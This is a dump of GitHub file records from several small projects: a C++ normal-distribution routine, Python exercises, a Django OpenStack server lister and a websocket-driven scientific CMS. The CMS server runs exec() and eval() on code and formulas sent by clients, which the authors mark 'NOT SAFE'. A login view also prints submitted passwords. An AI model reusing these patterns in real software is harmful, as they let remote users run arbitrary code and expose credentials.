"069f111a68ccca4541d932038b50282d43aa62f7", "content_id": "590a92e9e4aafbfd58e7b2c6b0cadb8df4b373e8", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5962, "license_type": "permissive", "max_line_length": 120, "num_lines": 146, "path": "/pyqstrat/cpp/lets_be_rational/normaldistribution.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// normaldistribution.cpp\n//\n\n#if defined(_MSC_VER)\n# define NOMINMAX // to suppress MSVC's definitions of min() and max()\n// These four pragmas are the equivalent to /fp:fast.\n# pragma float_control( except, off )\n# pragma float_control( precise, off )\n# pragma fp_contract( on )\n# pragma fenv_access( off )\n#endif\n\n#include \"normaldistribution.h\"\n#include <float.h>\n\nnamespace {\n // The asymptotic expansion Φ(z) = φ(z)/|z|·[1-1/z^2+...], Abramowitz & Stegun (26.2.12), suffices for Φ(z) to have\n // relative accuracy of 1.64E-16 for z<=-10 with 17 terms inside the square brackets (not counting the leading 1).\n // This translates to a maximum of about 9 iterations below, which is competitive with a call to erfc() and never\n // less accurate when z<=-10. Note that, as mentioned in section 4 (and discussion of figures 2 and 3) of George\n // Marsaglia's article \"Evaluating the Normal Distribution\" (available at http://www.jstatsoft.org/v11/a05/paper),\n // for values of x approaching -8 and below, the error of any cumulative normal function is actually dominated by\n // the hardware (or compiler implementation) accuracy of exp(-x²/2) which is not reliably more than 14 digits when\n // x becomes large. Still, we should switch to the asymptotic only when it is beneficial to do so.\n const double norm_cdf_asymptotic_expansion_first_threshold = -10.0;\n const double norm_cdf_asymptotic_expansion_second_threshold = -1/sqrt(DBL_EPSILON);\n}\n\ndouble norm_cdf(double z){\n if (z <= norm_cdf_asymptotic_expansion_first_threshold) {\n // Asymptotic expansion for very negative z following (26.2.12) on page 408\n // in M. Abramowitz and A. Stegun, Pocketbook of Mathematical Functions, ISBN 3-87144818-4.\n double sum = 1;\n if (z >= norm_cdf_asymptotic_expansion_second_threshold) {\n double zsqr = z * z, i = 1, g = 1, x, y, a = DBL_MAX, lasta;\n do {\n lasta = a;\n x = (4 * i - 3) / zsqr;\n y = x * ((4 * i - 1) / zsqr);\n a = g * (x - y);\n sum -= a;\n g *= y;\n ++i;\n a = fabs(a);\n } while (lasta > a && a >= fabs(sum * DBL_EPSILON));\n }\n return -norm_pdf(z) * sum / z;\n }\n return 0.5*erfc_cody( -z*ONE_OVER_SQRT_TWO );\n}\n\ndouble inverse_norm_cdf(double u){\n //\n // ALGORITHM AS241 APPL. STATIST. (1988) VOL. 37, NO. 3\n //\n // Produces the normal deviate Z corresponding to a given lower\n // tail area of u; Z is accurate to about 1 part in 10**16.\n // see http://lib.stat.cmu.edu/apstat/241\n //\n const double split1 = 0.425;\n const double split2 = 5.0;\n const double const1 = 0.180625;\n const double const2 = 1.6;\n\n // Coefficients for P close to 0.5\n const double A0 = 3.3871328727963666080E0;\n const double A1 = 1.3314166789178437745E+2;\n const double A2 = 1.9715909503065514427E+3;\n const double A3 = 1.3731693765509461125E+4;\n const double A4 = 4.5921953931549871457E+4;\n const double A5 = 6.7265770927008700853E+4;\n const double A6 = 3.3430575583588128105E+4;\n const double A7 = 2.5090809287301226727E+3;\n const double B1 = 4.2313330701600911252E+1;\n const double B2 = 6.8718700749205790830E+2;\n const double B3 = 5.3941960214247511077E+3;\n const double B4 = 2.1213794301586595867E+4;\n const double B5 = 3.9307895800092710610E+4;\n const double B6 = 2.8729085735721942674E+4;\n const double B7 = 5.2264952788528545610E+3;\n // Coefficients for P not close to 0, 0.5 or 1.\n const double C0 = 1.42343711074968357734E0;\n const double C1 = 4.63033784615654529590E0;\n const double C2 = 5.76949722146069140550E0;\n const double C3 = 3.64784832476320460504E0;\n const double C4 = 1.27045825245236838258E0;\n const double C5 = 2.41780725177450611770E-1;\n const double C6 = 2.27238449892691845833E-2;\n const double C7 = 7.74545014278341407640E-4;\n const double D1 = 2.05319162663775882187E0;\n const double D2 = 1.67638483018380384940E0;\n const double D3 = 6.89767334985100004550E-1;\n const double D4 = 1.48103976427480074590E-1;\n const double D5 = 1.51986665636164571966E-2;\n const double D6 = 5.47593808499534494600E-4;\n const double D7 = 1.05075007164441684324E-9;\n // Coefficients for P very close to 0 or 1\n const double E0 = 6.65790464350110377720E0;\n const double E1 = 5.46378491116411436990E0;\n const double E2 = 1.78482653991729133580E0;\n const double E3 = 2.96560571828504891230E-1;\n const double E4 = 2.65321895265761230930E-2;\n const double E5 = 1.24266094738807843860E-3;\n const double E6 = 2.71155556874348757815E-5;\n const double E7 = 2.01033439929228813265E-7;\n const double F1 = 5.99832206555887937690E-1;\n const double F2 = 1.36929880922735805310E-1;\n const double F3 = 1.48753612908506148525E-2;\n const double F4 = 7.86869131145613259100E-4;\n const double F5 = 1.84631831751005468180E-5;\n const double F6 = 1.42151175831644588870E-7;\n const double F7 = 2.04426310338993978564E-15;\n\n if (u<=0)\n return log(u);\n if (u>=1)\n return log(1-u);\n\n const double q = u-0.5;\n if (fabs(q) <= split1)\n {\n const double r = const1 - q*q;\n return q * (((((((A7 * r + A6) * r + A5) * r + A4) * r + A3) * r + A2) * r + A1) * r + A0) /\n (((((((B7 * r + B6) * r + B5) * r + B4) * r + B3) * r + B2) * r + B1) * r + 1.0);\n }\n else\n {\n double r = q<0.0 ? u : 1.0-u;\n r = sqrt(-log(r));\n double ret;\n if (r < split2)\n {\n r = r - const2;\n ret = (((((((C7 * r + C6) * r + C5) * r + C4) * r + C3) * r + C2) * r + C1) * r + C0) /\n (((((((D7 * r + D6) * r + D5) * r + D4) * r + D3) * r + D2) * r + D1) * r + 1.0);\n }\n else\n {\n r = r - split2;\n ret = (((((((E7 * r + E6) * r + E5) * r + E4) * r + E3) * r + E2) * r + E1) * r + E0) /\n (((((((F7 * r + F6) * r + F5) * r + F4) * r + F3) * r + F2) * r + F1) * r + 1.0);\n }\n return q<0.0 ? -ret : ret;\n }\n}\n\n" } ]
29
ysecmg/Fluent-Python
https://github.com/ysecmg/Fluent-Python
5dfbc312189c211007740f69a5440343560323d9
ffff7b1660ed6762af122900e968664748536312
00ce96427c69391cd9c2dc8d86d86c639ff556a5
refs/heads/master
2020-07-23T20:10:59.647366
2019-09-16T11:37:27
2019-09-16T11:37:27
207,693,937
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5155993700027466, "alphanum_fraction": 0.6174055933952332, "avg_line_length": 27, "blob_id": "0d4bae125f4d6556bb55f08a9243c52a9aaaaa18", "content_id": "31a79cab41e9eaab960efbe0289d98de7d19c118", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 609, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/2_tuple.py", "repo_name": "ysecmg/Fluent-Python", "src_encoding": "UTF-8", "text": "colors = ['black', 'white']\r\nsizes = ['S', 'M', 'L']\r\ntshirts = [(color, size) for color in colors for size in sizes]\r\n\r\n'''\r\nfor tshirt in ('%s %s' % (c,s) for c in colors for s in sizes):\r\n print(tshirt)\r\n'''\r\n\r\n# lax_coordinates = (33.9425, -118.408056)\r\n# latitude, longitude = lax_coordinates\r\n\r\n# quotient, remainder = divmod(20,8)\r\n\r\nfrom collections import namedtuple\r\nCity = namedtuple('City', 'name country population coordinates')\r\nmetro_areas = [\r\n ('Tokyo', 'JP', 36.933, (35.689722, 139.691667)),\r\n ('Delhi NCR', 'IN', 21.935, (28.613889,77.208889)),\r\n]\r\ntokyo = City(*metro_areas[0])\r\n" } ]
1
hlshao/scientific-cms
https://github.com/hlshao/scientific-cms
f762151bb7a7331f1b5cc70d203a41c3211ab234
d04efe912ef882574a0c0d5be68ee92f56a11cf5
f1b895e3625c314e6bb113c59584ec83bee95d91
refs/heads/master
2020-12-02T23:57:02.476922
2017-06-30T04:45:15
2017-06-30T04:45:15
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6121672987937927, "alphanum_fraction": 0.6121672987937927, "avg_line_length": 19.230770111083984, "blob_id": "21cd8945759e0217ea428a0cc9a38943513894d1", "content_id": "e03370e8b17081b361b47ffac8b126513dae438a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "no_license", "max_line_length": 32, "num_lines": 13, "path": "/trivial_tools.py", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "import threading\n\ndef safely(func):\n try: return func()\n except: return None\n\ndef get_locker():\n lock = threading.Lock()\n def locker(func, lock=lock):\n lock.acquire()\n try: return func()\n finally: lock.release()\n return locker\n" }, { "alpha_fraction": 0.5606446266174316, "alphanum_fraction": 0.5685608983039856, "avg_line_length": 33.67647171020508, "blob_id": "a06bf3e9460d6028daf55314a9467e6b576ff6c0", "content_id": "5c89a1494afa6289ca7c39e98c4bac66733dc31e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3537, "license_type": "no_license", "max_line_length": 111, "num_lines": 102, "path": "/server.py", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "import os\nimport uuid\nimport json\nimport time\nimport ast\n\nfrom bottle import request, Bottle, abort, static_file\nfrom gevent.pywsgi import WSGIServer\nfrom geventwebsocket import WebSocketError\nfrom geventwebsocket.handler import WebSocketHandler\n\nfrom spreadsheet import Spreadsheet\nfrom widgets import render\nfrom trivial_tools import safely, get_locker\nimport pages\n\napp = Bottle()\nsheets = {}\nclients = {}\nlocker = get_locker()\n\[email protected]('/static/<path:path>')\ndef static(path):\n return static_file(path, root='static')\n\[email protected]('/pages/search')\ndef search():\n items = pages.search(request.query['keywords'].split())\n return {'status':'success', 'data':'items'}\n\[email protected]('/pages/<name>', method=\"GET\")\ndef get_page(name):\n item = pages.retrieve(name)\n return {'status':'success', 'data':'item'}\n\[email protected]('/pages/<name>', method=\"POST\")\ndef post_page(name): \n pages.store(id=name, title=request.json['title'], markup=request.json['markup'], code=request.json['code'])\n return {'status':'success'}\n\[email protected]('/websocket')\ndef handle_websocket():\n # assign a uuid to the client\n client_id = str(uuid.uuid4()) \n print client_id,'websocket connected'\n # request the websocket\n ws = request.environ.get('wsgi.websocket')\n if not ws:\n abort(400, 'Expected WebSocket request.')\n clients[client_id] = ws\n state = None\n while True: \n try:\n raw_msg = ws.receive()\n except:\n break\n msg = safely(lambda: json.loads(raw_msg)) \n if not msg:\n time.sleep(0.1)\n continue \n print 'msg:', msg\n command = msg.get('command') \n # {command: \"search\", keywords: \"hello world\"}\n if command == 'search': \n keywords = msg['keywords'].split()\n items = pages.search(keywords)\n ws.send(json.dumps({'command':'search-results', 'items':items}))\n # {command: \"open\", id: \"r18r4g18734tr1087t\"}\n elif command == 'open': \n id = msg['id']\n locker(lambda: id in sheets or sheets.update({id: Spreadsheet(id)}))\n page = pages.retrieve(id) or {'id':id, 'title':'new page', 'markup':'', 'code':''}\n ws.send(json.dumps({'command':'page', 'page':page}))\n # {command: \"compute\", id: \"...\" code: \"...\", formulas: {..}}\n elif command == 'compute':\n id = msg['id']\n if not id in sheets: continue\n sheet = sheets[id]\n if 'code' in msg:\n context = {}\n try:\n exec(msg['code'], {}, context) # NOT SAFE CHECK THIS HERE\n sheets[id].context = context\n except:\n pass\n changes = msg['formulas']\n if changes == None: return\n for key in changes.keys():\n if not changes[key] == '=':\n safely(lambda: changes.update({key:ast.literal_eval(changes[key])}))\n changes = locker(lambda: sheets[id].process(changes))\n values = {key:render(value) for key, value in changes['values'].iteritems()}\n ws.send(json.dumps({'command':'values', 'values':values}))\n # {command: \"save\", page: {id:..., title:..., markup:..., code:...} }\n elif command == 'save':\n pages.store(**msg['page'])\n\ndef main():\n server = WSGIServer((\"127.0.0.1\", 8000), app, handler_class=WebSocketHandler)\n server.serve_forever()\n\nif __name__ == '__main__': main()\n" }, { "alpha_fraction": 0.5601202249526978, "alphanum_fraction": 0.5731462836265564, "avg_line_length": 28.352941513061523, "blob_id": "f7d2906a6e620745597ee1ba4110924ce94de4a0", "content_id": "b4f49d031789b0b8e967992bbabb8eac49aae5d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 998, "license_type": "no_license", "max_line_length": 100, "num_lines": 34, "path": "/pages.py", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "import rethinkdb as r\n\nr.connect( \"localhost\", 28015).repl()\ntry:\n r.table_create(\"pages\").run()\nexcept:\n pass # page table already exists\n\ndef store(id, title, markup, code):\n res = r.table(\"pages\").replace({'id': id, 'title': title, 'markup': markup, 'code': code}).run()\n if res['replaced'] == 0:\n r.table(\"pages\").insert({'id': id, 'title': title, 'markup': markup, 'code': code}).run()\n\ndef retrieve(id):\n return r.table(\"pages\").get(id).run()\n\ndef search(keywords):\n results = []\n pages = r.table(\"pages\").run()\n for page in pages:\n print page['title'], keywords\n if all(keyword in page['title'] for keyword in keywords):\n results.append({'id':page['id'], 'title':page['title']})\n return results\n\nif __name__ == '__main__':\n store(1,'test1','','')\n store(2,'test2','','')\n store(3,'test3','','')\n #print search(['test'])\n #print retrieve(1)\n pages = r.table(\"pages\").run()\n for page in pages:\n print page\n" }, { "alpha_fraction": 0.5386138558387756, "alphanum_fraction": 0.5409901142120361, "avg_line_length": 30.962024688720703, "blob_id": "5df8cb8d1cd14c653df7666691619cba42d760bf", "content_id": "21cdd328ea3457221a236aafd65d46291f52e7ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2525, "license_type": "no_license", "max_line_length": 77, "num_lines": 79, "path": "/spreadsheet.py", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport copy\nimport json\nimport cPickle as pickle\n\nclass Spreadsheet(object):\n\n regex_string = re.compile('\\w+')\n\n def __init__(self, name):\n self.name = name\n self.formulas = {}\n self.values = {}\n self.context = {}\n\n def load(self, name):\n if os.path.exists(name):\n with open(name) as myfile:\n data = pickle.load(myfile)\n self.formulas, self.values = data['fomulas'], data['values'] \n\n def save(self, name):\n with open(name, 'w') as myfile:\n data = {'fomulas':self.formulas, 'values':self.values}\n pickle.dump(data, myfile)\n\n def process(self, changes):\n keys = changes.keys()\n for key in changes:\n self.formulas[key] = changes[key]\n self.run()\n self.save(self.name)\n return {'formulas':self.formulas, 'values':self.values}\n\n def find_neighbors(self):\n neighbors = {key:[] for key in self.formulas}\n for k, value in self.formulas.iteritems():\n if isinstance(value, basestring) and value[:1] == '=':\n keys = self.regex_string.findall(value)\n [neighbors[i].append(k) for i in keys if i in neighbors]\n return neighbors\n\n def topological_sort(self, neighbors):\n sorted_keys, visited = [], set()\n def visit(k):\n if not k in visited:\n visited.add(k)\n [visit(i) for i in neighbors[k]]\n sorted_keys.insert(0, k)\n [visit(k) for k in self.formulas if k not in visited]\n return sorted_keys\n\n def run(self):\n values = copy.copy(self.context)\n neighbors = self.find_neighbors()\n sorted_keys = self.topological_sort(neighbors)\n for key in sorted_keys:\n value = self.formulas[key]\n if str(value).startswith('='):\n try:\n value = eval(value[1:], {}, values) # NOT SAFE\n except Exception as e:\n value = '<span class=\"error\">%s</span>' % e\n values[key] = value\n self.values = {key: values[key] for key in self.formulas}\n \ndef main():\n import math\n s = Spreadsheet('test')\n s.context = vars(math)\n formulas = dict(x=\"=sin(c+a)\", a=1, b=2, c='=a+d+e', d='=b-a', e='=a+b')\n print s.process(formulas)\n changes = dict(a=2)\n print s.process(changes)\n s.save('test.pickle')\n s.load('test.pickle')\n \nif __name__ == '__main__': main()\n" }, { "alpha_fraction": 0.4901773929595947, "alphanum_fraction": 0.49322906136512756, "avg_line_length": 39.03053283691406, "blob_id": "1a420fa7958ddddfa92a50a88b523b82d778fd81", "content_id": "34eb100230d46015dcc83f81899f00151da0a60d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5243, "license_type": "permissive", "max_line_length": 117, "num_lines": 131, "path": "/static/js/cms.js", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "let init_app = () => {\n let app = {};\n app.metamarked = (text) => {\n text = text.replace(/\\[\\[(\\w+\\:.*?)\\]\\]/g,(m)=>{\n let idx = m.indexOf(':');\n let name = m.substr(2,idx-2);\n let value = m.substr(idx+1,m.length-idx-3); \n if(['True','False'].indexOf(value)>=0) {\n app.vue.values[name] = value;\n app.vue.formulas[name] = value;\n return '<input type=\"checkbox\" id=\"input-'+name+'\" value=\"'+value+'\"/>';\n } else if(value.indexOf('|')>=0) {\n let items = value.split('|');\n value = items[0];\n app.vue.values[name] = value;\n app.vue.formulas[name] = value;\n options = items.map((i)=>{return '<option value=\"'+i+'\">'+i+'</option>';}).join('');\n return '<select id=\"input-'+name+'\">'+options+'</select>';\n } else {\n app.vue.values[name] = value;\n app.vue.formulas[name] = value;\n return '<input type=\"text\" id=\"input-'+name+'\" value=\"'+value+'\"/>';\n }\n });\n text = text.replace(/\\[\\[(\\w+\\=.*?)\\]\\]/g, (m)=>{\n let idx = m.indexOf('=');\n let name = m.substr(2,idx-2);\n let formula = m.substr(idx,m.length-idx-2);\n app.vue.formulas[name] = formula;\n return '<span id=\"output-'+name+'\" >'+formula+'</span>';\n });\n text = marked(text);\n return text;\n };\n app.process = () => {\n let data = {'values':app.vue.values, 'formulas':app.vue.formulas};\n axios.post('/compute',data).then(app.handle_response);\n };\n app.command_page = (data) => {\n console.log('received command \"page\"');\n app.vue.title = data.page.title;\n app.vue.markup = data.page.markup;\n app.vue.code = data.page.code;\n Vue.nextTick(app.send_formulas);\n };\n app.command_values = (data) => {\n for(let key in data.values) { \n if(data.values[key][0]=='<')\n jQuery('#output-'+key).html(data.values[key]);\n else\n jQuery('#output-'+key).text(data.values[key]);\n }\n };\n app.command_search_results = (data) => {\n app.vue.search_results = data.items;\n };\n app.handle_response = (data) => {\n data = JSON.parse(data);\n if(data.command == 'page' && data.page.id == app.vue.id) app.command_page(data);\n else if(data.command == 'values') app.command_values(data);\n else if(data.command == 'search-results') app.command_search_results(data);\n };\n app.onkeyup = (event) => {\n let elem = jQuery(event.target);\n let value = null;\n let name = event.target.id.substr(6);\n if(elem.attr('type')=='checkbox') value = elem.is(':checked'); else value = elem.val();\n app.vue.values[name] = value;\n app.vue.formulas[name] = value;\n app.send_formulas();\n };\n app.reconnected = () => {\n console.log('reconnecting...');\n let data = {'command':'open', 'id':app.vue.id};\n app.ws.send(JSON.stringify(data));\n }; \n app.save = () => {\n let page = {'id':app.vue.id, 'title':app.vue.title, 'markup':app.vue.markup, 'code':app.vue.code};\n let data = {'command':'save', 'page':page};\n app.ws.send(JSON.stringify(data));\n };\n app.send_formulas = () => {\n let data = {'command':'compute', 'id':app.vue.id, 'formulas':app.vue.formulas, 'code':app.vue.code};\n console.log(data);\n app.ws.send(JSON.stringify(data));\n };\n app.init = () => {\n app.vue.id = window.location.hash.substr(1) || 'home';\n app.domain = window.location.href.split('/')[2];\n app.ws = new ReconnectingWebSocket('ws://'+app.domain+'/websocket');\n app.ws.onopen = app.reconnected;\n app.ws.onmessage = (evt) => { app.handle_response(evt.data); };\n jQuery('.output').on('keyup','input[type=text]',app.onkeyup);\n jQuery('.output').on('change','select,input[type=checkbox]',app.onkeyup);\n jQuery(window).on('hashchange', () => { app.vue.id=window.location.hash.substr(1); app.reconnected(); });\n };\n app.tonew = () => {\n window.location = window.location.href.split('#')[0]+'#'+Math.random();\n };\n app.search = () => {\n app.ws.send(JSON.stringify({'command':'search', 'keywords':app.vue.keywords}));\n };\n app.data = {\n id: '',\n title: '',\n markup: '',\n code: '',\n formulas: {},\n values: {},\n keywords: '',\n search_results: []\n };\n app.methods = {\n metamarked: app.metamarked,\n save: app.save, \n tonew: app.tonew\n };\n app.filters = {\n };\n app.watch = {\n 'markup': app.send_formulas,\n 'keywords': app.search,\n 'id': app.reconnect,\n 'code': app.send_formulas\n };\n app.vue = new Vue({el: '#target', data: app.data, methods: app.methods, filters: app.filters, watch: app.watch});\n app.init();\n return app;\n};\n \nlet app = init_app();" }, { "alpha_fraction": 0.3866608440876007, "alphanum_fraction": 0.3918918967247009, "avg_line_length": 30.875, "blob_id": "964457e9a6bb7f07e68b31230b6234b1a37ddf8e", "content_id": "432e60420717754a0cd554a00d56460894f44ef4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2294, "license_type": "permissive", "max_line_length": 73, "num_lines": 72, "path": "/static/js/main.js", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "let app_init = () => {\n let app = {};\n let vue = app.vue = new Vue({\n el: '#target',\n data: {\n selected_key: null,\n selected_value: null,\n rows: [],\n cols: [],\n cells: {},\n values: {},\n to: {},\n from: {},\n },\n methods: {\n select: (key) => { app.select(key); }\n },\n watch: {\n selected_value: (value) => { app.selected_value(value); }\n }\n });\n app.select = (key) => {\n vue.selected_key = key;\n vue.selected_value = vue.cells[key];\n vue.$refs.input.focus();\n };\n app.selected_value = (value) => {\n let key = vue.selected_key; \n let keys = value.match(/\\w+/ig)||[];\n vue.cells[key] = vue.selected_value;\n keys = keys.filter((key) => { return key in vue.cells; });\n if(JSON.stringify(keys)!=JSON.stringify(JSON.stringify)) {\n let f = (i) => { return i!=key; };\n let g = (k) => { vue.from[k] = vue.from[k].filter(f); };\n vue.to[key].map(g);\n vue.to[key] = keys;\n keys.map((k)=>{ vue.from[k].push(key);});\n } \n app.update(key)\n };\n app.update = (key) => {\n let old_value = vue.values[key];\n let value = vue.cells[key];\n if(old_value!=value) {\n if((''+value)[0]=='=') {\n try {\n value = math.eval(value.substr(1), vue.values);\n value = (typeof value == typeof {})?'obj':value;\n } catch(e) { value = 'error'; }\n }\n vue.values[key] = value;\n vue.from[key].map(app.update);\n }\n };\n app.init = () => {\n for(let i=1; i<=100; i++) {\n app.vue.rows.push(i);\n for(let j=1; j<=26; j++) {\n var c = String.fromCharCode(64+j);\n if(i==1) app.vue.cols.push(c);\n let key = c+i;\n app.vue.cells[key] = app.vue.values[key] = '';\n app.vue.to[key] = [];\n app.vue.from[key] = [];\n }\n }\n };\n app.init();\n return app;\n};\n \nlet app = app_init();" } ]
6
ayasakov/actual_server_list
https://github.com/ayasakov/actual_server_list
0c4d2acda1a16e356cb4575b40d41d76ececc565
1fe917d6daa38e1ed882f5a3dc331cd4661755d2
b43d3b9bef8879e0adc719a87264b078fea3a13c
refs/heads/master
2021-01-20T11:44:06.878580
2013-11-19T10:54:13
2013-11-19T10:54:13
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5283018946647644, "alphanum_fraction": 0.5283018946647644, "avg_line_length": 12.25, "blob_id": "06fd422429ff47b6632796b0b41830dedb6a917a", "content_id": "8d2b1ed02d9f97c30c118fefcb122c2fd419ff4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/README.md", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "actual_server_list\n==================\n\npython+django\n" }, { "alpha_fraction": 0.5340909361839294, "alphanum_fraction": 0.5340909361839294, "avg_line_length": 34.20000076293945, "blob_id": "23673315fde96d881da0101d861e6286d65724d2", "content_id": "6ec9679c0df219759f89db31b9351b4212cfc4a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 176, "license_type": "no_license", "max_line_length": 70, "num_lines": 5, "path": "/web/web/urls.py", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('',\n url(r'^checkList/', include('checkList.urls')),\n )\n" }, { "alpha_fraction": 0.44071856141090393, "alphanum_fraction": 0.44431138038635254, "avg_line_length": 27.79310417175293, "blob_id": "1e25f9356ebc32fe146e8cafa63e83c088927112", "content_id": "87cccdc4eebedf8e012a87cb7c7009f124abaab6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 835, "license_type": "no_license", "max_line_length": 69, "num_lines": 29, "path": "/web/checkList/listServers.py", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "from novaclient.v1_1 import client\n\n\nclass List:\n\n def __init__(self, user, password, project_id, auth_url):\n self.nova = client.Client(user, password,\n project_id=project_id,\n auth_url=auth_url)\n\n def buildList(self):\n #result = [{'name': 'Name Server',\n # 'status': 'Status Server',\n # 'ip': 'Adresses',\n # }]\n result = []\n\n try:\n listServer = self.nova.servers.list()\n except:\n return result\n\n for server in listServer:\n result.append({\n 'name': server.name,\n 'status': server.status,\n 'ip': ''.join(server.addresses['private'][0]['addr'])\n })\n return result\n" }, { "alpha_fraction": 0.6043645739555359, "alphanum_fraction": 0.6048780679702759, "avg_line_length": 27.021583557128906, "blob_id": "34f45a9019775729e237c44639460bd58c8bf0f6", "content_id": "92e4ad00dac1a79f679db7572eddb5950ff57a8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3895, "license_type": "no_license", "max_line_length": 78, "num_lines": 139, "path": "/web/checkList/views.py", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "# Create your views here.\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\nfrom django.contrib.auth import authenticate, login\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nimport json\n\n\nfrom checkList.forms import UserForm, UserProfileForm\nfrom checkList import listServers\n\n\ndef index(request):\n context = RequestContext(request)\n context_dict = \"\"\n return render_to_response('checkList/index.html', context_dict, context)\n\n\ndef register(request):\n context = RequestContext(request)\n registered = False\n\n if request.method == 'POST':\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileForm(data=request.POST)\n\n if user_form.is_valid() and profile_form.is_valid():\n user = user_form.save()\n\n user.set_password(user.password)\n user.save()\n\n profile = profile_form.save(commit=False)\n profile.user = user\n\n profile.save()\n registered = True\n\n else:\n print user_form.errors, profile_form.errors\n\n else:\n user_form = UserForm()\n profile_form = UserProfileForm()\n\n return render_to_response(\n 'checkList/register.html',\n {\n 'user_form': user_form,\n 'profile_form': profile_form,\n 'registered': registered\n },\n context)\n\n\ndef user_login(request):\n context = RequestContext(request)\n\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(username=username, password=password)\n\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect('/checkList/')\n else:\n return HttpResponse(\"Your account is disabled.\")\n else:\n print \"Invalid login details: {0}, {1}\".format(username, password)\n return HttpResponse(\"Invalid login details supplied.\")\n\n else:\n return render_to_response('checkList/login.html', {}, context)\n\n\n@login_required\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect('/checkList/')\n\n\ndef about(request):\n return HttpResponse(\"Page about this project. Comming soon...\")\n\n\n@login_required\ndef user_edit(request):\n context = RequestContext(request)\n user_profile = request.user.get_profile()\n\n edited = False\n\n if request.method == 'POST':\n profile_form = UserProfileForm(data=request.POST,\n instance=user_profile)\n\n if profile_form.is_valid():\n profile_form.save()\n edited = True\n\n else:\n print profile_form.errors\n\n else:\n profile_form = UserProfileForm(\n initial={'login_nova': user_profile.login_nova,\n 'password_nova': user_profile.password_nova,\n 'project_id': user_profile.project_id,\n 'auth_url': user_profile.auth_url})\n\n return render_to_response(\n 'checkList/edit.html',\n {'profile_form': profile_form, 'edited': edited},\n context)\n\n\n@login_required\ndef list(request):\n context = RequestContext(request)\n\n user = context['user']\n context_dict = \"\"\n\n if user.is_active:\n profile = user.get_profile()\n ListServer = listServers.List(profile.login_nova,\n profile.password_nova,\n profile.project_id,\n profile.auth_url)\n context_dict = ListServer.buildList()\n\n return HttpResponse(json.dumps(context_dict),\n content_type=\"application/json\")\n" }, { "alpha_fraction": 0.6551265120506287, "alphanum_fraction": 0.6671105027198792, "avg_line_length": 26.851852416992188, "blob_id": "d48d753550c0f5990dbc0012c0dcf1686c4479d8", "content_id": "d1b027c6d64e3446ec1e94f12a5c2b50fff7d15f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 751, "license_type": "no_license", "max_line_length": 79, "num_lines": 27, "path": "/setup.py", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "from distutils.core import setup\nfrom subprocess import Popen, PIPE\nimport argparse\n\ndef check_pep8():\n print Popen(\"pep8 web/\", shell=True, stdin=PIPE, stdout=PIPE).stdout.read()\n\ndef init_argparser():\n parser = argparse.ArgumentParser(description='Argument for setup.py')\n parser.add_argument('pep8', help='Check pep8', default=None, nargs='*')\n parser.add_argument('unittest', help='Run test', default=None, nargs='*')\n return parser.parse_args()\n\ndef tests():\n pass\n\nargs = init_argparser()\n\nif args.pep8 and args.unittest is None:\n setup(name='checkList',\n version='1.0',\n py_modules=['listServers'])\nelse:\n if args.pep8 is not None:\n check_pep8()\n if args.unittest is not None:\n tests()" } ]
5
StefanM98/Project-Movie-Trailer-Website
https://github.com/StefanM98/Project-Movie-Trailer-Website
3dad29f15ee82a8d7347c9cdcc054ca279763dc4
4ef5c0c0dd73fc7a4c5121ea753239052ada6134
f523bcbd4140d97e802c1393910190cbec9e29d4
refs/heads/master
2021-01-22T18:50:03.795588
2017-03-15T23:03:05
2017-03-15T23:03:05
85,118,761
0
0
null
null
null
null
null
